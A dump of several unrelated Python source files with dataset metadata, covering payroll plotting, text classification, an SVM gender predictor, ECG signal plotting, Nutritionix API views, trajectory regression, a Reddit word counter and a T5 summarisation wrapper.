"code-starcoder2", "pt": "12", "api": [{"api_name": "h5py.File", "line_number": 19, "usage_type": "call"}, {"api_name": "scipp.array", "line_number": 25, "usage_type": "call"}, {"api_name": "scipp.array", "line_number": 26, "usage_type": "call"}, {"api_name": "scipp.array", "line_number": 27, "usage_type": "call"}, {"api_name": "scipp.array", "line_number": 29, "usage_type": "call"}, {"api_name": "scipp.array", "line_number": 30, "usage_type": "call"}, {"api_name": "scipp.array", "line_number": 31, "usage_type": "call"}, {"api_name": "scipp.array", "line_number": 32, "usage_type": "call"}, {"api_name": "scipp.ones_like", "line_number": 34, "usage_type": 
"call"}, {"api_name": "scipp.DataArray", "line_number": 40, "usage_type": "call"}, {"api_name": "scipp.array", "line_number": 50, "usage_type": "call"}, {"api_name": "scipp.array", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "scipp.array", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.suptitle", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 82, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 83, "usage_type": "call"}, {"api_name": "os.path", "line_number": 83, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 87, "usage_type": "call"}]} {"seq_id": "316742786", "text": "import matplotlib.pyplot as plt\nimport pandas as pd\nfrom matplotlib import gridspec\nimport matplotlib.ticker as mtick\n\n\ndef grids():\n \"\"\"Applies aesthetic gridding to a subplot axis.\"\"\"\n\n ax.minorticks_on()\n ax.tick_params('y', length=8, which='major', labelsize='10')\n ax.tick_params('y', length=3, which='minor')\n ax.tick_params('x', which='both', bottom=False, top=False)\n ax.set_axisbelow(True)\n ax.grid(True, which='major', ls='-', lw=.5, alpha=0.75, zorder=0, color='lightgray')\n ax.grid(True, which='minor', ls=':', alpha=.15, zorder=0, color='lightgray')\n\n\ndef spines():\n for spine in ax.spines.values():\n spine.set_visible(False)\n\n\ndef ticks():\n ax.tick_params(which='both', top=False, left=False, right=False, bottom=False)\n\n\ndef set_gridspec(widths, heights, wspace=0, hspace=0):\n fig = plt.figure(figsize=(sum(widths) + wspace * (len(widths) - 1),\n sum(heights) + hspace * (len(heights) - 1)))\n gs = gridspec.GridSpec(len(heights), len(widths),\n height_ratios=heights, width_ratios=widths)\n return fig, gs\n\n\ndef getPayrollData(year, job_title):\n df = pd.read_csv(f\"payroll data/santa-cruz-{year}.csv\")\n df_stats = df.loc[df['Job Title'].str.lower()==job_title.lower()].describe()\n return df_stats\n\npayroll_years = range(2011, 2019)\npayroll_data = {year: getPayrollData(year, 'Police Officer') for year in payroll_years}\n\n\n# Initializing figure.\nfig, gs = set_gridspec(widths=[15], heights=[7, 1, 7])\n\n# First figure\nax = fig.add_subplot(gs[0])\ngrids(); spines()\nax.set_facecolor('ghostwhite')", "sub_path": "police_payroll.py", "file_name": "police_payroll.py", "file_ext": "py", "file_size_in_byte": 1614, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "matplotlib.pyplot.figure", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "matplotlib.gridspec.GridSpec", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.gridspec", "line_number": 31, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 37, "usage_type": "call"}]} {"seq_id": "409076802", "text": "import pickle\nimport pandas as pd\nimport nltk\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import punkt\nfrom nltk.corpus.reader import wordnet\nfrom nltk.stem import WordNetLemmatizer\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport requests\nfrom bs4 import 
BeautifulSoup\nimport numpy as np\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport dash_table\nfrom dash.dependencies import Input, Output, State\nimport plotly.graph_objs as go\n\npath_models = \"./04. Model Training/Models/\"\n\n# SVM\npath_svm = path_models + 'best_svc.pickle'\nwith open(path_svm, 'rb') as data:\n    svc_model = pickle.load(data)\n\npath_tfidf = \"./03. Feature Engineering/Pickles/tfidf.pickle\"\n\nwith open(path_tfidf, 'rb') as data:\n    tfidf = pickle.load(data)\n\ncategory_codes = {\n    'business': 0,\n    'entertainment': 1,\n    'politics': 2,\n    'sport': 3,\n    'tech': 4,\n    'other':5\n}\n\npunctuation_signs = list(\"?:!.,;\")\nstop_words = list(stopwords.words('english'))\n\ndef create_features_from_df(df):\n    \n    df['Content_Parsed_1'] = df['Content'].str.replace(\"\\r\", \" \")\n    df['Content_Parsed_1'] = df['Content_Parsed_1'].str.replace(\"\\n\", \" \")\n    df['Content_Parsed_1'] = df['Content_Parsed_1'].str.replace(\" \", \" \")\n    df['Content_Parsed_1'] = df['Content_Parsed_1'].str.replace('\"', '')\n    \n    df['Content_Parsed_2'] = df['Content_Parsed_1'].str.lower()\n    \n    df['Content_Parsed_3'] = df['Content_Parsed_2']\n    for punct_sign in punctuation_signs:\n        df['Content_Parsed_3'] = df['Content_Parsed_3'].str.replace(punct_sign, '')\n    \n    df['Content_Parsed_4'] = df['Content_Parsed_3'].str.replace(\"'s\", \"\")\n    \n    wordnet_lemmatizer = WordNetLemmatizer()\n    nrows = len(df)\n    lemmatized_text_list = []\n    for row in range(0, nrows):\n\n        # Create an empty list containing lemmatized words\n        lemmatized_list = []\n        # Save the text and its words into an object\n        text = df.loc[row]['Content_Parsed_4']\n        text_words = text.split(\" \")\n        # Iterate through every word to lemmatize\n        for word in text_words:\n            lemmatized_list.append(wordnet_lemmatizer.lemmatize(word, pos=\"v\"))\n        # Join the list\n        lemmatized_text = \" \".join(lemmatized_list)\n        # Append to the list containing the texts\n        lemmatized_text_list.append(lemmatized_text)\n    \n    df['Content_Parsed_5'] = lemmatized_text_list\n    \n    df['Content_Parsed_6'] = df['Content_Parsed_5']\n    for stop_word in stop_words:\n        regex_stopword = r\"\\b\" + stop_word + r\"\\b\"\n        df['Content_Parsed_6'] = df['Content_Parsed_6'].str.replace(regex_stopword, '')\n    \n    # TF-IDF\n    features = tfidf.transform(df['Content_Parsed_6']).toarray()\n    \n    return features\n\n\ndef get_category_name(category_id):\n    for category, id_ in category_codes.items(): \n        if id_ == category_id:\n            return category\n\ndef predict_from_features(features):\n    \n    # Obtain the highest probability of the predictions for each article\n    predictions_proba = svc_model.predict_proba(features).max(axis=1) \n    \n    # Predict using the input model\n    predictions_pre = svc_model.predict(features)\n\n    # Replace prediction with 'other' (5) if associated cond. probability less than threshold\n    predictions = []\n\n    for prob, cat in zip(predictions_proba, predictions_pre):\n        if prob > .65:\n            predictions.append(cat)\n        else:\n            predictions.append(5)\n\n    # Return result\n    categories = [get_category_name(x) for x in predictions]\n    \n    return categories\n\ndef complete_df(df, categories):\n    try:\n        df['Prediction'] = categories\n    except Exception as ex:\n        print(\"Exception\", ex, len(df), len(categories))\n        # fall back to \"other\" only when the assignment fails\n        df['Prediction'] = \"other\"\n\n    return df", "sub_path": "06. 
App Creation/Utilities.py", "file_name": "Utilities.py", "file_ext": "py", "file_size_in_byte": 3813, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "pickle.load", "line_number": 24, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 29, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords.words", "line_number": 41, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords", "line_number": 41, "usage_type": "name"}, {"api_name": "nltk.stem.WordNetLemmatizer", "line_number": 58, "usage_type": "call"}]} {"seq_id": "274072828", "text": "import sklearn.svm\r\nimport numpy\r\nimport argparse\r\n\r\n\r\ndef parse_file(file):\r\n\tf = open(file, 'r+')\r\n\tsamples = [(line[-1] == '\\n' and line[:-1] or line).decode('utf-8').split('\\t') for line in f if line[0] != '#']\r\n\tfeatures = [[int(feature) for feature in sample[1:]] for sample in samples]\r\n\tclasses = [(sample[0] == u\"male\" and 1 or -1) for sample in samples]\r\n\treturn features, classes\r\n\r\n\t\r\ndef get_features(files):\r\n\tfeatures = []\r\n\tclasses = []\r\n\tfor file in files:\r\n\t\tfile_features, file_classes = parse_file(file)\r\n\t\tfeatures.extend(file_features)\r\n\t\tclasses.extend(file_classes)\r\n\treturn features, classes\r\n\t\r\n\t\r\ndef parse_args():\r\n\tparser = argparse.ArgumentParser(description = 'SVM friends gender predictor')\r\n\tparser.add_argument('input_files', metavar='IN', type=str, nargs='+', help='input files to use')\r\n\treturn parser.parse_args()\r\n\r\n\t\t\r\nclass GenderPredictor(object):\r\n\t\r\n\tdef __init__(self):\r\n\t\tself.clf = sklearn.svm.SVC()\r\n\t\t\r\n\tdef fit(self, features, classes):\r\n\t\tself.clf.fit(features, classes)\r\n\t\t\r\n\tdef predict(self, features):\r\n\t\treturn self.clf.predict(features).tolist()\r\n\t\t\r\n\tdef test(self, predictions, classes):\r\n\t\tprint(\"Predicted classes:\")\r\n\t\tprint(predictions)\r\n\t\tprint(\"Real classes:\")\r\n\t\tprint(classes)\r\n\t\tsucceed = len([prediction for prediction, clas in zip(predictions, classes) if prediction == clas])\r\n\t\ttotal = len(classes)\r\n\t\taccuracy = 1.0 * succeed / total * 100\r\n\t\tprint(\"Accuracy: \"\t+ str(succeed) + \" succeed of \" + str(total) + \" total (\" + str(accuracy) + \"%)\")\r\n\t\treturn accuracy\r\n\r\n\tdef split_for_testing(self, features, classes):\r\n\t\tprint (len(classes))\r\n\t\ttests = len(classes) / 4\r\n\t\treturn ({\"features\":features[tests:], \"classes\":classes[tests:]},\r\n\t\t\t\t{\"features\":features[:tests], \"classes\":classes[:tests]})\r\n\r\ndef main():\r\n\targs = parse_args()\r\n\tfeatures, classes = get_features(args.input_files)\r\n\tmodel = GenderPredictor()\r\n\ttrainers, testers = model.split_for_testing(features, classes)\r\n\tmodel.fit(trainers[\"features\"], trainers[\"classes\"])\r\n\tpredictions = model.predict(testers[\"features\"])\r\n\tmodel.test(predictions, testers[\"classes\"])\r\n\t\r\n\r\nif __name__ == \"__main__\":\r\n\tmain()\r\n", "sub_path": "fb_svm/svm.py", "file_name": "svm.py", "file_ext": "py", "file_size_in_byte": 2149, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 25, "usage_type": "call"}, {"api_name": "sklearn.svm.svm.SVC", "line_number": 33, "usage_type": "call"}, {"api_name": "sklearn.svm.svm", "line_number": 33, "usage_type": "attribute"}, {"api_name": "sklearn.svm", "line_number": 33, "usage_type": 
"name"}]} {"seq_id": "567418054", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Oct 18 11:00:20 2019\r\n\r\n@author: Adit\r\n\"\"\"\r\n\r\n## Memotong Sinyal pada Node(Detik Ke-2)\r\n\r\nimport wfdb\r\nfrom matplotlib import pyplot as plt\r\nimport numpy as np\r\n\r\nrecord = wfdb.rdrecord('Sinyal/101')\r\nrecord_dict = record.__dict__\r\nsinyal = record_dict['p_signal'][:,0]\r\n\r\nsinyal_satu_detik = sinyal\r\n\r\nfig,ax1 = plt.subplots(nrows=1)\r\nax1.plot(np.arange(720),signal[:720])\r\nplt.savefig('Sinyal.jpg')", "sub_path": "ISYSRG BATCH 2_MRizkyAdityaUtama.py", "file_name": "ISYSRG BATCH 2_MRizkyAdityaUtama.py", "file_ext": "py", "file_size_in_byte": 445, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "wfdb.rdrecord", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}]} {"seq_id": "156104490", "text": "import json\nimport ssl\nimport requests\n\nfrom django.conf import settings\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\n\ncontext = ssl._create_unverified_context()\n\n@api_view()\n@permission_classes((IsAuthenticated,))\ndef evaluate_calories(request):\n profile = request.user.profile\n data = {\n \"query\": request.query_params.get('query'),\n \"gender\": 'male',\n \"weight_kg\": profile.weight / 2.205,\n \"height_cm\": profile.height,\n \"age\": profile.age\n }\n\n if request.query_params.get('query') is not None:\n a = prepare_nutritionix_request('/natural/exercise', data)\n obj = json.loads(a.text)\n\n total_calories = 0\n exercises = []\n for exercise in obj['exercises']:\n total_calories += exercise['nf_calories']\n exercises.append(exercise['name'])\n return Response({\n 'calories': total_calories,\n 'exercises': exercises\n })\n\n return Response({})\n\n\n@api_view()\n@permission_classes((IsAuthenticated,))\ndef evaluate_nutrients(request):\n data = {\n \"query\": request.query_params.get('query'),\n \"timezone\": \"PDT\"\n }\n\n if request.query_params.get('query') is not None:\n a = prepare_nutritionix_request('/natural/nutrients', data)\n obj = json.loads(a.text)\n\n total_calories, total_fat, total_carb, total_protein = 0, 0, 0, 0\n ingredients = []\n for ingredient in obj['foods']:\n total_calories += ingredient['nf_calories']\n total_carb += ingredient['nf_total_carbohydrate']\n total_fat += ingredient['nf_total_fat']\n total_protein += ingredient['nf_protein']\n\n ingredients.append({\n \"name\": ingredient['food_name'],\n \"quantity\": ingredient['serving_qty'],\n \"protein\": ingredient['nf_protein'],\n \"carb\": ingredient['nf_total_carbohydrate'],\n \"fat\": ingredient['nf_total_fat'],\n \"calories\": ingredient['nf_calories']\n })\n return Response({\n 'calories': total_calories,\n 'fat': total_fat,\n 'carb': total_carb,\n 'protein': total_protein,\n 'foods': ingredients\n })\n\n return Response({})\n\n\ndef prepare_nutritionix_request(url, data=None):\n headers = {\n 'x-app-id': settings.NUTRIONIX_APP_ID,\n 'x-app-key': settings.NUTRIONIX_APP_KEY,\n 'x-remote-user-id': 
settings.NUTRIONIX_USER_ID,\n 'x-user-jwt': settings.NUTRIONIX_TOKEN\n }\n\n if data is not None:\n r = requests.post(settings.NUTRIONIX_URL + url, data, headers=headers)\n else:\n r = requests.get(settings.NUTRIONIX_URL + url, headers=headers)\n return r\n\n\ndef is_connected(response):\n return True", "sub_path": "global_api/functions_view.py", "file_name": "functions_view.py", "file_ext": "py", "file_size_in_byte": 2924, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "ssl._create_unverified_context", "line_number": 10, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 26, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 33, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 38, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 12, "usage_type": "call"}, {"api_name": "rest_framework.decorators.permission_classes", "line_number": 13, "usage_type": "call"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 13, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 51, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 69, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 77, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 41, "usage_type": "call"}, {"api_name": "rest_framework.decorators.permission_classes", "line_number": 42, "usage_type": "call"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 42, "usage_type": "name"}, {"api_name": "django.conf.settings.NUTRIONIX_APP_ID", "line_number": 82, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 82, "usage_type": "name"}, {"api_name": "django.conf.settings.NUTRIONIX_APP_KEY", "line_number": 83, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 83, "usage_type": "name"}, {"api_name": "django.conf.settings.NUTRIONIX_USER_ID", "line_number": 84, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 84, "usage_type": "name"}, {"api_name": "django.conf.settings.NUTRIONIX_TOKEN", "line_number": 85, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 85, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 89, "usage_type": "call"}, {"api_name": "django.conf.settings.NUTRIONIX_URL", "line_number": 89, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 89, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 91, "usage_type": "call"}, {"api_name": "django.conf.settings.NUTRIONIX_URL", "line_number": 91, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 91, "usage_type": "name"}]} {"seq_id": "562328590", "text": "from sklearn import linear_model\nimport pandas as pd\nimport sys\nsys.path.append('../')\nfrom lib.prediction import show_trajectories\nfrom matplotlib import pyplot as plt\nfrom sklearn.model_selection import train_test_split\n\ndef learn_and_show_no_test(regressor_x, regressor_y, data_to_learn, trajectory):\n \"\"\"\n\n :param regressor_x: regressor for x coordinate\n :param regressor_y: regressor for y coordinate\n :param data_to_learn: df with some data to learn\n :param trajectory: column with lables to learn\n :return: predicted trajectory\n \"\"\"\n 
regressor_x.fit(data_to_learn, trajectory.x)\n    regressor_y.fit(data_to_learn, trajectory.y)\n    # making predictions\n    predictions_x = regressor_x.predict(data_to_learn)\n    predictions_y = regressor_y.predict(data_to_learn)\n\n    # creating data_output to pass to plotter and scorer\n    d = {'x': predictions_x,\n         'y': predictions_y,\n         'tmsp': data_to_learn.tmsp.values.tolist()\n         }\n    trajectory_pred = pd.DataFrame(data=d)\n\n    # the plotter given by authors can't deal with shuffled data\n    _ = plt.plot(trajectory.x.values, trajectory.y.values, c='blue', label='Trajectory')\n    _ = plt.plot(trajectory_pred.x.values, trajectory_pred.y.values, c='red', label='Predicted')\n    legend = plt.legend(shadow=True, fontsize='medium', loc='upper right')\n    plt.title('predicted and test trajectories')\n    plt.xlabel('x')\n    plt.ylabel('y')\n    plt.show()\n\n    # if we are working with a linear regressor from sklearn we are to look at coefficients\n    if isinstance(regressor_x, linear_model.LinearRegression):\n        print('x_predictor:')\n        for pair in zip(data_to_learn.columns, regressor_x.coef_):\n            print(pair)\n\n        print('y_predictor:')\n        for pair in zip(data_to_learn.columns, regressor_y.coef_):\n            print(pair)\n\n    figure, scores = show_trajectories(trajectory, trajectory_pred)\n    print(scores)\n\n    return trajectory_pred\n\n\ndef learn_test_train(predictor_x, predictor_y, shuffle, test_size, data_to_learn, trajectory):\n    \"\"\"\n    the function learns the given predictors on data_to_learn. To build the test set we use sklearn train_test_split,\n    so test_size and shuffle are to be given\n    :param predictor_x: regressor for x coordinate\n    :param predictor_y: regressor for y coordinate\n    :param shuffle: should we shuffle the test? (True/False)\n    :param test_size: test size from [0, 1]\n    :param data_to_learn: df with some data to learn\n    :param trajectory: column with labels to learn\n    :return:\n    \"\"\"\n    (X_train,\n     X_test,\n     x_train, x_test) = train_test_split(data_to_learn, trajectory.x,\n                                         test_size=test_size,\n                                         random_state=0,\n                                         shuffle=shuffle\n                                         )\n    (Y_train,\n     Y_test,\n     y_train, y_test) = train_test_split(data_to_learn, trajectory.y,\n                                         test_size=test_size,\n                                         random_state=0,\n                                         shuffle=shuffle\n                                         )\n\n    predictor_x.fit(X_train, x_train)\n    predictor_y.fit(Y_train, y_train)\n\n    predictions_x = predictor_x.predict(X_test)\n    predictions_y = predictor_y.predict(Y_test)\n\n    # creating data_output to pass to plotter and scorer\n    d = {'x': predictions_x,\n         'y': predictions_y,\n         'tmsp': Y_test.tmsp.values.tolist()\n         }\n    trajectory_pred = pd.DataFrame(data=d)\n\n    d = {'x': x_test,\n         'y': y_test,\n         'tmsp': Y_test.tmsp.values.tolist()\n         }\n    trajectory_test = pd.DataFrame(data=d)\n\n    # if we are working with a linear regressor from sklearn we are to look at coefficients\n    if isinstance(predictor_x, linear_model.LinearRegression):\n        print('x_predictor:')\n        for pair in zip(data_to_learn.columns, predictor_x.coef_):\n            print(pair)\n\n        print('y_predictor:')\n        for pair in zip(data_to_learn.columns, predictor_y.coef_):\n            print(pair)\n    # the plotter given by authors can't deal with shuffled data\n    _ = plt.scatter(x_test, y_test, s=0.5, c='blue', label='Test')\n    _ = plt.scatter(trajectory_pred.x.values, trajectory_pred.y.values, s=1, c='red', label='Predicted')\n    legend = plt.legend(shadow=True, fontsize='medium', loc='upper right')\n    plt.title('test and predicted trajectory')\n    plt.xlabel('x')\n    plt.ylabel('y')\n    plt.show()\n\n    _ = plt.scatter(x_train, y_train, s=1, c='red', label='Train')\n    _ = plt.scatter(trajectory_pred.x.values, trajectory_pred.y.values, s=1, c='green', label='Predicted')\n    legend = plt.legend(shadow=True, fontsize='medium', 
loc='upper right')\n plt.title('train and predicted trajectory')\n plt.xlabel('x')\n plt.ylabel('y')\n plt.show()\n\n figure, scores = show_trajectories(trajectory_test, trajectory_pred)\n print(scores)\n\n", "sub_path": "trajectory_prediction/lib/learning_and_testing.py", "file_name": "learning_and_testing.py", "file_ext": "py", "file_size_in_byte": 4996, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "sys.path.append", "line_number": 4, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 4, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "lib.prediction.show_trajectories", "line_number": 50, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 70, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 77, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 94, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 112, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 112, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 113, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 116, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 116, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 117, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 118, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 120, "usage_type": "name"}, {"api_name": 
"matplotlib.pyplot.scatter", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 122, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 123, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 124, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 124, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 125, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 125, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 126, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 126, "usage_type": "name"}, {"api_name": "lib.prediction.show_trajectories", "line_number": 128, "usage_type": "call"}]} {"seq_id": "243504672", "text": "#!/usr/bin/python3\n\"\"\"\nDefines recursive function to query the Reddit API,\nparse titles of all hot articles, and print sorted count\n\"\"\"\n\n\ndef count_words(subreddit, word_list, after=None, count={}):\n \"\"\"\n Queries the Reddit API, parses titles of all hot articles,\n and prints sorted count\n\n parameters:\n subreddit: subreddit to query for hot articles\n word_list: list of keywords to count\n after: indicates next starting point to get data after\n count: dictionary of current count of keyword\n \"\"\"\n import json\n import requests\n if after is None:\n sub_URL = 'https://www.reddit.com/r/{}/hot.json'.format(subreddit)\n else:\n sub_URL = 'https://www.reddit.com/r/{}/hot.json?after={}'.format(\n subreddit, after)\n subreddit_info = requests.get(sub_URL,\n headers={\"user-agent\": \"user\"},\n allow_redirects=False)\n for word in word_list:\n word = word.lower()\n if word not in count.keys():\n count[word] = 0\n try:\n data = subreddit_info.json().get(\"data\")\n except:\n return\n children = data.get(\"children\")\n for child in children:\n title = (child.get(\"data\").get(\"title\").lower())\n title = title.split(' ')\n for word in word_list:\n word = word.lower()\n count[word] += title.count(word)\n after = data.get(\"after\")\n if after is not None:\n return count_words(subreddit, word_list, after, count)\n result = []\n for k in count.keys():\n if count[k] != 0:\n if result == []:\n result.append(\"{}: {}\".format(k, count[k]))\n else:\n for i in range(len(result)):\n if count[k] > int(result[i].split(' ')[1]):\n result = result[:i] + \\\n [\"{}: {}\".format(k, count[k])] + \\\n result[i:]\n break\n elif count[k] == int(result[i].split(' ')[1]):\n alpha_list = [k, result[i].split(' ')[0]]\n j = 1\n if (i + j) >= len(result):\n continue\n while count[k] == int(result[i + j].split(' ')[1]):\n alpha_list.append(result[i + j].split(' ')[0])\n alpha_list = alpha_list.sort\n for j in range(len(alpha_list)):\n if k == alpha_list[j]:\n result = result[:i + j] + \\\n [\"{}: {}\".format(k, count[k])] + \\\n result[i + j:]\n else:\n continue\n else:\n result.append(\"{}: {}\".format(k, count[k]))\n if result != []:\n for printing in result:\n print(printing)\n", "sub_path": "0x13-count_it/0-count.py", "file_name": "0-count.py", "file_ext": "py", "file_size_in_byte": 2974, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "requests.get", 
"line_number": 26, "usage_type": "call"}]} {"seq_id": "474779662", "text": "import logging\n\ntry:\n import torch\n from transformers import AutoModelForSeq2SeqLM, AutoTokenizer\nexcept ImportError:\n # No installation required if not using this function\n pass\n\nfrom nlpaug.model.lang_models import LanguageModels\n\nimport nlpaug.util.text.tokenizer as text_tokenizer\n\n\nclass T5(LanguageModels):\n # https://arxiv.org/pdf/1910.10683.pdf\n\n def __init__(self, model_path='t5-base', min_length=10, max_length=20, num_beam=3, no_repeat_ngram_size=3, \n device='cuda', silence=True):\n super().__init__(device, temperature=None, top_k=None, top_p=None, silence=True)\n try:\n import transformers\n except ModuleNotFoundError:\n raise ModuleNotFoundError('Missed transformers library. Install transfomers by `pip install transformers`')\n\n self.model_path = model_path\n self.min_length = min_length\n self.max_length = max_length\n self.num_beam = num_beam\n self.no_repeat_ngram_size = no_repeat_ngram_size\n\n self.tokenizer = AutoTokenizer.from_pretrained(model_path)\n if silence:\n # Transformers thrown an warning regrading to weight initialization. It is expected\n orig_log_level = logging.getLogger('transformers.' + 'modeling_utils').getEffectiveLevel()\n logging.getLogger('transformers.' + 'modeling_utils').setLevel(logging.ERROR)\n self.model = AutoModelForSeq2SeqLM.from_pretrained(model_path)\n logging.getLogger('transformers.' + 'modeling_utils').setLevel(orig_log_level)\n\n self.model.to(self.device)\n self.model.eval()\n\n self.text_prefix = 'summarize: '\n self.return_tensor = 'pt' # PyTorch\n self.early_stopping = True\n self.skip_special_token = True\n self.default_max_length_ratio = 0.5\n\n def predict(self, text, n=1):\n # Convert to feature\n token_ids = self.tokenizer.encode(self.text_prefix + text, return_tensors=self.return_tensor)\n\n # Prediction\n min_length = self.get_min_length(text)\n max_length = self.get_max_length(text)\n target_token_ids = self.model.generate(token_ids,\n min_length=min_length, max_length=max_length, num_beams=self.num_beam,\n no_repeat_ngram_size=self.no_repeat_ngram_size)\n\n tokens = self.tokenizer.decode(target_token_ids[0], skip_special_tokens=self.skip_special_token)\n\n # Return full sentence only.\n for i in range(len(tokens)-1, -1, -1):\n if tokens[i] in text_tokenizer.SENTENCE_SEPARATOR:\n return tokens[:i+1]\n\n return 